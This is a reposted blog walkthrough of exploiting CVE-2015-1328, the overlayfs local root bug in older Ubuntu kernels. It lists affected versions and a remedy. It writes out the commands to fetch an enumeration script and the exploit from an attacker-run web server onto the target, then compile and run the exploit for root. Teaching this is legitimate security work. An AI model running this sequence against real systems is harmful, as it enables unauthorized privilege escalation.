‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c-泓源视野

‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c

The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace. (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1328)

Ubuntu could allow a local attacker to gain elevated privileges on the system, caused by incorrect permission checks when creating new files in the upper filesystem directory by the overlayfs filesystem. An attacker could exploit this vulnerability to gain root privileges on the system. Note: This vulnerability also affects Cloud Foundry. (https://exchange.xforce.ibmcloud.com/vulnerabilities/103882)

Affected releases

  • (Ubuntu 14.04/15.10)
  • Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04

Affected kernel

  • Linux Kernel 4.3.3
  • Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)

For more info

https://seclists.org/oss-sec/2015/q2/717

https://www.securityfocus.com/bid/75206/info

https://www.exploit-db.com/exploits/37293

‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c插图

Identification

1. We should already have access to the machine, since, this is a post-exploitation activity, and the attack is done locally. First thing we need to do is identify the kernel version

  • lsb_release -a

‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c插图1

2. check the kernel version

  • uname -a

‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c插图2

Note: It was identified at the 4.3.3 version. So, we are on good track with 3.13.0, older version.

3. To make sure this is vulnerable, let’s run a script that detects possible vulnerabilities. linux-exploit suggester (see how to use https://vk9-sec.com/linux-exploit-suggester-enumeration-linux-kernellinux-based-machine/)

Source code (https://github.com/mzet-/linux-exploit-suggester)

  • cd /tmp
  • wget http://192.168.0.13:9999/linux-exploit-suggester.sh
  • chmod 777 linux-exploit-suggester.sh
  • ./linux-exploit-suggester.sh

‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c插图3

Note: Highly vulnerable, means this is likely to have success.

Execution

1. Download the exploit to your Kali/Parrot machine, and share it by any means with the remote server. I’d use a python web server

  • wget https://www.exploit-db.com/download/37292
  • mv 37292 exploit.c
  • ls -l exploit.c
  • python3.9 -m http.server 9999

‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c插图4

2. In the remote server access the Kali web server, and download the script in /tmp

  • wget http://192.168.0.13:9999/exploit.c

‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c插图5

3. Proceed to compile, and, execute the script

  • gcc exploit.c -o exploit
  • ./exploit
  • whoami
  • hostname

‘overlayfs’ Local Privilege Escalation – CVE-2015-1328 exploit.c插图6

Remedy

Apply the patch for this vulnerability, available from the Ubuntu GIT Repository.

For Cloud Foundry Elastic Runtime:

Upgrade to the latest version (1.4.5 or later), available from the Pivotal Web site.

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
3

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8231829 位访客, 您的IP是:[162.158.62.136]